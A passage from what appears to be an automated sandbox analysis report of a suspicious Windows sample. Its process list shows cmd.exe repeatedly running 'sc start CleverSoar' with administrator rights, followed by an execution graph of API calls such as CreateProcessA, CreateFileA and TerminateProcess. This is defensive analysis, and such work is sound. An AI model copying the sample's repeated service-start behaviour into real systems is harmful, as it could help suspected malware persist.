                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:84
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:85
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:86
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:87
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:88
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:89
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:90
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:91
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:92
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:93
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:94
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:95
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:96
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:97
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:98
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:99
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:100
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:101
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:102
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:103
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:104
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:105
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:106
                                      Start time:03:11:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:1.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:15.3%
                                        Total number of Nodes:790
                                        Total number of Limit Nodes:13
                                        execution_graph 100308 6bf54a27 100309 6bf54a5d _strlen 100308->100309 100310 6bf6639e 100309->100310 100311 6bf55b6f 100309->100311 100312 6bf55b58 100309->100312 100316 6bf55b09 _Yarn 100309->100316 100438 6c0d0130 18 API calls 2 library calls 100310->100438 100315 6c0c6a43 std::_Facet_Register 4 API calls 100311->100315 100424 6c0c6a43 100312->100424 100315->100316 100399 6c0baec0 100316->100399 100319 6bf55bad std::ios_base::_Ios_base_dtor 100319->100310 100322 6bf59ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100319->100322 100403 6c0c4ff0 CreateProcessA 100319->100403 100320 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100320->100322 100321 6c0baec0 FindFirstFileA 100321->100322 100322->100310 100322->100320 100322->100321 100323 6bf5a292 Sleep 100322->100323 100341 6bf5e619 100322->100341 100398 6bf59bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100323->100398 100324 6bf56624 100327 6c0c6a43 std::_Facet_Register 4 API calls 100324->100327 100325 6bf5660d 100326 6c0c6a43 std::_Facet_Register 4 API calls 100325->100326 100333 6bf565bc _Yarn _strlen 100326->100333 100327->100333 100328 6bf561cb _strlen 100328->100310 100328->100324 100328->100325 100328->100333 100329 6bf59bbd GetCurrentProcess TerminateProcess 100329->100322 100330 6bf663b2 100439 6bf415e0 18 API calls std::ios_base::_Ios_base_dtor 100330->100439 100332 6bf664f8 100333->100330 100334 6bf56970 100333->100334 100335 6bf56989 100333->100335 100338 6bf56920 _Yarn 100333->100338 100336 6c0c6a43 std::_Facet_Register 4 API calls 100334->100336 100337 6c0c6a43 std::_Facet_Register 4 API calls 100335->100337 100336->100338 100337->100338 100407 6c0c5960 100338->100407 100340 6bf5f243 CreateFileA 100356 6bf5f2a7 100340->100356 100341->100340 100342 6bf569d6 std::ios_base::_Ios_base_dtor _strlen 100342->100310 100343 6bf56dd2 100342->100343 100344 6bf56dbb 100342->100344 100357 6bf56d69 _Yarn _strlen 100342->100357 100345 6c0c6a43 std::_Facet_Register 4 API calls 100343->100345 100347 6c0c6a43 std::_Facet_Register 4 API calls 100344->100347 100345->100357 100346 6bf602ca 100347->100357 100348 6c0c5960 104 API calls 100348->100398 100349 6bf57427 100351 6c0c6a43 std::_Facet_Register 4 API calls 100349->100351 100350 6bf57440 100352 6c0c6a43 std::_Facet_Register 4 API calls 100350->100352 100353 6bf573da _Yarn 100351->100353 100352->100353 100354 6c0c5960 104 API calls 100353->100354 100358 6bf5748d std::ios_base::_Ios_base_dtor _strlen 100354->100358 100355 6bf602ac GetCurrentProcess TerminateProcess 100355->100346 100356->100346 100356->100355 100357->100330 100357->100349 100357->100350 100357->100353 100358->100310 100359 6bf57991 100358->100359 100360 6bf579a8 100358->100360 100363 6bf57940 _Yarn _strlen 100358->100363 100361 6c0c6a43 std::_Facet_Register 4 API calls 100359->100361 100362 6c0c6a43 std::_Facet_Register 4 API calls 100360->100362 100361->100363 100362->100363 100363->100330 100364 6bf57de2 100363->100364 100365 6bf57dc9 100363->100365 100368 6bf57d7c _Yarn 100363->100368 100367 6c0c6a43 std::_Facet_Register 4 API calls 100364->100367 100366 6c0c6a43 std::_Facet_Register 4 API calls 100365->100366 100366->100368 100367->100368 100369 6c0c5960 104 API calls 100368->100369 100370 6bf57e2f std::ios_base::_Ios_base_dtor _strlen 100369->100370 100370->100310 100371 6bf585bf 100370->100371 100372 6bf585a8 100370->100372 100379 6bf58556 _Yarn _strlen 100370->100379 100374 6c0c6a43 std::_Facet_Register 4 API calls 100371->100374 100373 6c0c6a43 std::_Facet_Register 4 API calls 100372->100373 100373->100379 100374->100379 100375 6bf58983 100378 6c0c6a43 std::_Facet_Register 4 API calls 100375->100378 100376 6bf5896a 100377 6c0c6a43 std::_Facet_Register 4 API calls 100376->100377 100380 6bf5891d _Yarn 100377->100380 100378->100380 100379->100330 100379->100375 100379->100376 100379->100380 100381 6c0c5960 104 API calls 100380->100381 100384 6bf589d0 std::ios_base::_Ios_base_dtor _strlen 100381->100384 100382 6bf58f36 100386 6c0c6a43 std::_Facet_Register 4 API calls 100382->100386 100383 6bf58f1f 100385 6c0c6a43 std::_Facet_Register 4 API calls 100383->100385 100384->100310 100384->100382 100384->100383 100389 6bf58ecd _Yarn _strlen 100384->100389 100385->100389 100386->100389 100387 6bf59354 100390 6c0c6a43 std::_Facet_Register 4 API calls 100387->100390 100388 6bf5936d 100391 6c0c6a43 std::_Facet_Register 4 API calls 100388->100391 100389->100330 100389->100387 100389->100388 100392 6bf59307 _Yarn 100389->100392 100390->100392 100391->100392 100393 6c0c5960 104 API calls 100392->100393 100395 6bf593ba std::ios_base::_Ios_base_dtor 100393->100395 100394 6c0c4ff0 4 API calls 100394->100322 100395->100310 100395->100394 100396 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100396->100398 100397 6c0c4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100397->100398 100398->100310 100398->100322 100398->100329 100398->100330 100398->100348 100398->100396 100398->100397 100400 6c0baed6 FindFirstFileA 100399->100400 100401 6c0baed4 100399->100401 100402 6c0baf10 100400->100402 100401->100400 100402->100319 100404 6c0c50ca 100403->100404 100405 6c0c5080 WaitForSingleObject CloseHandle CloseHandle 100404->100405 100406 6c0c50e3 100404->100406 100405->100404 100406->100328 100408 6c0c59b7 100407->100408 100440 6c0c5ff0 100408->100440 100410 6c0c59c8 100459 6bf66ba0 100410->100459 100413 6c0c5a9f std::ios_base::_Ios_base_dtor 100416 6bf8e010 67 API calls 100413->100416 100415 6c0c59ec 100417 6c0c5a54 100415->100417 100423 6c0c5a67 100415->100423 100478 6c0c6340 100415->100478 100486 6bfa2000 100415->100486 100420 6c0c5ae2 std::ios_base::_Ios_base_dtor 100416->100420 100496 6c0c5b90 100417->100496 100420->100342 100421 6c0c5a5c 100517 6bf67090 100421->100517 100511 6bf8e010 100423->100511 100425 6c0c6a48 100424->100425 100426 6c0c6a62 100425->100426 100429 6c0c6a64 std::_Facet_Register 100425->100429 100976 6c0cf014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100425->100976 100426->100316 100428 6c0c78c3 std::_Facet_Register 100980 6c0c9379 RaiseException 100428->100980 100429->100428 100977 6c0c9379 RaiseException 100429->100977 100431 6c0c80bc IsProcessorFeaturePresent 100437 6c0c80e1 100431->100437 100433 6c0c7883 100978 6c0c9379 RaiseException 100433->100978 100435 6c0c78a3 std::invalid_argument::invalid_argument 100979 6c0c9379 RaiseException 100435->100979 100437->100316 100439->100332 100441 6c0c6025 100440->100441 100530 6bf92020 100441->100530 100443 6c0c60c6 100444 6c0c6a43 std::_Facet_Register 4 API calls 100443->100444 100445 6c0c60fe 100444->100445 100547 6c0c7327 100445->100547 100447 6c0c6112 100559 6bf91d90 100447->100559 100450 6c0c61ec 100450->100410 100452 6c0c6226 100567 6bf926e0 24 API calls 4 library calls 100452->100567 100454 6c0c6238 100568 6c0c9379 RaiseException 100454->100568 100456 6c0c624d 100457 6bf8e010 67 API calls 100456->100457 100458 6c0c625f 100457->100458 100458->100410 100460 6bf66bd5 100459->100460 100461 6bf92020 52 API calls 100460->100461 100462 6bf66c68 100461->100462 100463 6c0c6a43 std::_Facet_Register 4 API calls 100462->100463 100464 6bf66ca0 100463->100464 100465 6c0c7327 43 API calls 100464->100465 100466 6bf66cb4 100465->100466 100467 6bf91d90 89 API calls 100466->100467 100468 6bf66d5d 100467->100468 100469 6bf66d8e 100468->100469 100878 6bf92250 30 API calls 100468->100878 100469->100415 100471 6bf66dc8 100879 6bf926e0 24 API calls 4 library calls 100471->100879 100473 6bf66dda 100880 6c0c9379 RaiseException 100473->100880 100475 6bf66def 100476 6bf8e010 67 API calls 100475->100476 100477 6bf66e0f 100476->100477 100477->100415 100479 6c0c638d 100478->100479 100881 6c0c65a0 100479->100881 100481 6c0c647c 100481->100415 100484 6c0c63a5 100484->100481 100899 6bf92250 30 API calls 100484->100899 100900 6bf926e0 24 API calls 4 library calls 100484->100900 100901 6c0c9379 RaiseException 100484->100901 100487 6bfa203f 100486->100487 100490 6bfa2053 100487->100490 100910 6bf93560 32 API calls std::_Xinvalid_argument 100487->100910 100491 6bfa210e 100490->100491 100912 6bf92250 30 API calls 100490->100912 100913 6bf926e0 24 API calls 4 library calls 100490->100913 100914 6c0c9379 RaiseException 100490->100914 100492 6bfa2121 100491->100492 100911 6bf937e0 32 API calls std::_Xinvalid_argument 100491->100911 100492->100415 100497 6c0c5b9e 100496->100497 100500 6c0c5bd1 100496->100500 100915 6bf901f0 100497->100915 100498 6c0c5c83 100498->100421 100500->100498 100919 6bf92250 30 API calls 100500->100919 100503 6c0d0b18 67 API calls 100503->100500 100504 6c0c5cae 100920 6bf92340 24 API calls 100504->100920 100506 6c0c5cbe 100921 6c0c9379 RaiseException 100506->100921 100508 6c0c5cc9 100509 6bf8e010 67 API calls 100508->100509 100510 6c0c5d22 std::ios_base::_Ios_base_dtor 100509->100510 100510->100421 100512 6bf8e04b 100511->100512 100513 6bf8e0a3 100512->100513 100514 6bf901f0 64 API calls 100512->100514 100513->100413 100515 6bf8e098 100514->100515 100516 6c0d0b18 67 API calls 100515->100516 100516->100513 100518 6bf6709e 100517->100518 100521 6bf670d1 100517->100521 100519 6bf901f0 64 API calls 100518->100519 100522 6bf670c4 100519->100522 100520 6bf67183 100520->100423 100521->100520 100973 6bf92250 30 API calls 100521->100973 100524 6c0d0b18 67 API calls 100522->100524 100524->100521 100525 6bf671ae 100974 6bf92340 24 API calls 100525->100974 100527 6bf671be 100975 6c0c9379 RaiseException 100527->100975 100529 6bf671c9 100531 6c0c6a43 std::_Facet_Register 4 API calls 100530->100531 100532 6bf9207e 100531->100532 100533 6c0c7327 43 API calls 100532->100533 100534 6bf92092 100533->100534 100569 6bf92f60 42 API calls 4 library calls 100534->100569 100536 6bf920c8 100537 6bf9210d 100536->100537 100538 6bf92136 100536->100538 100539 6bf92120 100537->100539 100570 6c0c6f8e 9 API calls 2 library calls 100537->100570 100571 6bf92250 30 API calls 100538->100571 100539->100443 100542 6bf9215b 100572 6bf92340 24 API calls 100542->100572 100544 6bf92171 100573 6c0c9379 RaiseException 100544->100573 100546 6bf9217c 100546->100443 100548 6c0c7333 __EH_prolog3 100547->100548 100574 6c0c6eb5 100548->100574 100551 6c0c736f 100580 6c0c6ee6 100551->100580 100553 6c0c7351 100588 6c0c73ba 39 API calls std::locale::_Setgloballocale 100553->100588 100556 6c0c7359 100589 6c0c71b1 HeapFree GetLastError _Yarn 100556->100589 100557 6c0c73ac 100557->100447 100560 6bf91ddc 100559->100560 100561 6bf91dc7 100559->100561 100594 6c0c7447 100560->100594 100561->100450 100566 6bf92250 30 API calls 100561->100566 100565 6bf91e82 100566->100452 100567->100454 100568->100456 100569->100536 100570->100539 100571->100542 100572->100544 100573->100546 100575 6c0c6ecb 100574->100575 100576 6c0c6ec4 100574->100576 100579 6c0c6ec9 100575->100579 100591 6c0c858b EnterCriticalSection 100575->100591 100590 6c0d03cd 6 API calls std::_Lockit::_Lockit 100576->100590 100579->100551 100587 6c0c7230 6 API calls 2 library calls 100579->100587 100581 6c0d03db 100580->100581 100582 6c0c6ef0 100580->100582 100593 6c0d03b6 LeaveCriticalSection 100581->100593 100583 6c0c6f03 100582->100583 100592 6c0c8599 LeaveCriticalSection 100582->100592 100583->100557 100586 6c0d03e2 100586->100557 100587->100553 100588->100556 100589->100551 100590->100579 100591->100579 100592->100583 100593->100586 100595 6c0c7450 100594->100595 100596 6bf91dea 100595->100596 100603 6c0cfd4a 100595->100603 100596->100561 100602 6c0cc563 18 API calls __fassign 100596->100602 100598 6c0c749c 100598->100596 100614 6c0cfa58 65 API calls 100598->100614 100600 6c0c74b7 100600->100596 100615 6c0d0b18 100600->100615 100602->100565 100604 6c0cfd55 __wsopen_s 100603->100604 100605 6c0cfd68 100604->100605 100606 6c0cfd88 100604->100606 100640 6c0d0120 18 API calls __fassign 100605->100640 100613 6c0cfd78 100606->100613 100626 6c0dae0c 100606->100626 100613->100598 100614->100600 100616 6c0d0b24 __wsopen_s 100615->100616 100617 6c0d0b43 100616->100617 100619 6c0d0b2e 100616->100619 100624 6c0d0b3e 100617->100624 100749 6c0cc5a9 EnterCriticalSection 100617->100749 100764 6c0d0120 18 API calls __fassign 100619->100764 100620 6c0d0b60 100750 6c0d0b9c 100620->100750 100623 6c0d0b6b 100765 6c0d0b92 LeaveCriticalSection 100623->100765 100624->100596 100627 6c0dae18 __wsopen_s 100626->100627 100642 6c0d039f EnterCriticalSection 100627->100642 100629 6c0dae26 100643 6c0daeb0 100629->100643 100634 6c0daf72 100635 6c0db091 100634->100635 100667 6c0db114 100635->100667 100638 6c0cfdcc 100641 6c0cfdf5 LeaveCriticalSection 100638->100641 100640->100613 100641->100613 100642->100629 100650 6c0daed3 100643->100650 100644 6c0dae33 100657 6c0dae6c 100644->100657 100645 6c0daf2b 100662 6c0d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100645->100662 100647 6c0daf34 100663 6c0d47bb HeapFree GetLastError __dosmaperr 100647->100663 100650->100644 100650->100645 100660 6c0cc5a9 EnterCriticalSection 100650->100660 100661 6c0cc5bd LeaveCriticalSection 100650->100661 100651 6c0daf3d 100651->100644 100664 6c0d6c1f 6 API calls std::_Lockit::_Lockit 100651->100664 100653 6c0daf5c 100665 6c0cc5a9 EnterCriticalSection 100653->100665 100656 6c0daf6f 100656->100644 100666 6c0d03b6 LeaveCriticalSection 100657->100666 100659 6c0cfda3 100659->100613 100659->100634 100660->100650 100661->100650 100662->100647 100663->100651 100664->100653 100665->100656 100666->100659 100668 6c0db133 100667->100668 100669 6c0db146 100668->100669 100672 6c0db15b 100668->100672 100683 6c0d0120 18 API calls __fassign 100669->100683 100671 6c0db0a7 100671->100638 100680 6c0e3fde 100671->100680 100676 6c0db27b 100672->100676 100684 6c0e3ea8 37 API calls __fassign 100672->100684 100675 6c0db2cb 100675->100676 100685 6c0e3ea8 37 API calls __fassign 100675->100685 100676->100671 100687 6c0d0120 18 API calls __fassign 100676->100687 100678 6c0db2e9 100678->100676 100686 6c0e3ea8 37 API calls __fassign 100678->100686 100688 6c0e4396 100680->100688 100683->100671 100684->100675 100685->100678 100686->100676 100687->100671 100689 6c0e43a2 __wsopen_s 100688->100689 100690 6c0e43a9 100689->100690 100691 6c0e43d4 100689->100691 100706 6c0d0120 18 API calls __fassign 100690->100706 100697 6c0e3ffe 100691->100697 100696 6c0e3ff9 100696->100638 100708 6c0d06cb 100697->100708 100703 6c0e4034 100704 6c0e4066 100703->100704 100748 6c0d47bb HeapFree GetLastError __dosmaperr 100703->100748 100707 6c0e442b LeaveCriticalSection __wsopen_s 100704->100707 100706->100696 100707->100696 100709 6c0cbceb __fassign 37 API calls 100708->100709 100710 6c0d06dd 100709->100710 100711 6c0d06ef 100710->100711 100712 6c0d69d5 __wsopen_s 5 API calls 100710->100712 100713 6c0cbdf6 100711->100713 100712->100711 100714 6c0cbe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100713->100714 100715 6c0cbe0e 100714->100715 100715->100703 100716 6c0e406c 100715->100716 100717 6c0e44ec __wsopen_s 18 API calls 100716->100717 100718 6c0e4089 100717->100718 100719 6c0e160c __wsopen_s 14 API calls 100718->100719 100723 6c0e409e __dosmaperr 100718->100723 100720 6c0e40bc 100719->100720 100721 6c0e4457 __wsopen_s CreateFileW 100720->100721 100720->100723 100727 6c0e4115 100721->100727 100722 6c0e4192 GetFileType 100725 6c0e419d GetLastError 100722->100725 100726 6c0e41e4 100722->100726 100723->100703 100724 6c0e4167 GetLastError 100724->100723 100728 6c0cf9f2 __dosmaperr 100725->100728 100731 6c0e17b0 __wsopen_s SetStdHandle 100726->100731 100727->100722 100727->100724 100729 6c0e4457 __wsopen_s CreateFileW 100727->100729 100730 6c0e41ab CloseHandle 100728->100730 100732 6c0e415a 100729->100732 100730->100723 100744 6c0e41d4 100730->100744 100733 6c0e4205 100731->100733 100732->100722 100732->100724 100734 6c0e4251 100733->100734 100736 6c0e4666 __wsopen_s 70 API calls 100733->100736 100735 6c0e4710 __wsopen_s 70 API calls 100734->100735 100739 6c0e4258 100734->100739 100737 6c0e4286 100735->100737 100736->100734 100738 6c0e4294 100737->100738 100737->100739 100738->100723 100741 6c0e4310 CloseHandle 100738->100741 100740 6c0db925 __wsopen_s 21 API calls 100739->100740 100740->100723 100742 6c0e4457 __wsopen_s CreateFileW 100741->100742 100743 6c0e433b 100742->100743 100743->100744 100745 6c0e4345 GetLastError 100743->100745 100744->100723 100746 6c0e4351 __dosmaperr 100745->100746 100747 6c0e171f __wsopen_s SetStdHandle 100746->100747 100747->100744 100748->100704 100749->100620 100751 6c0d0bbe 100750->100751 100752 6c0d0ba9 100750->100752 100755 6c0d0bb9 100751->100755 100766 6c0d0cb9 100751->100766 100788 6c0d0120 18 API calls __fassign 100752->100788 100755->100623 100760 6c0d0be1 100781 6c0db898 100760->100781 100762 6c0d0be7 100762->100755 100789 6c0d47bb HeapFree GetLastError __dosmaperr 100762->100789 100764->100624 100765->100624 100767 6c0d0cd1 100766->100767 100771 6c0d0bd3 100766->100771 100768 6c0d9c60 18 API calls 100767->100768 100767->100771 100769 6c0d0cef 100768->100769 100790 6c0dbb6c 100769->100790 100772 6c0d873e 100771->100772 100773 6c0d8755 100772->100773 100775 6c0d0bdb 100772->100775 100773->100775 100846 6c0d47bb HeapFree GetLastError __dosmaperr 100773->100846 100776 6c0d9c60 100775->100776 100777 6c0d9c6c 100776->100777 100778 6c0d9c81 100776->100778 100847 6c0d0120 18 API calls __fassign 100777->100847 100778->100760 100780 6c0d9c7c 100780->100760 100782 6c0db8a9 __dosmaperr 100781->100782 100783 6c0db8be 100781->100783 100782->100762 100784 6c0db907 __dosmaperr 100783->100784 100785 6c0db8e5 100783->100785 100856 6c0d0120 18 API calls __fassign 100784->100856 100848 6c0db9c1 100785->100848 100788->100755 100789->100755 100792 6c0dbb78 __wsopen_s 100790->100792 100791 6c0dbb80 __dosmaperr 100791->100771 100792->100791 100793 6c0dbbca 100792->100793 100794 6c0dbc33 __dosmaperr 100792->100794 100801 6c0e1990 EnterCriticalSection 100793->100801 100831 6c0d0120 18 API calls __fassign 100794->100831 100796 6c0dbbd0 100799 6c0dbbec __dosmaperr 100796->100799 100802 6c0dbc5e 100796->100802 100830 6c0dbc2b LeaveCriticalSection __wsopen_s 100799->100830 100801->100796 100803 6c0dbc80 100802->100803 100822 6c0dbc9c __dosmaperr 100802->100822 100804 6c0dbcd4 100803->100804 100806 6c0dbc84 __dosmaperr 100803->100806 100805 6c0dbce7 100804->100805 100840 6c0dac69 20 API calls __wsopen_s 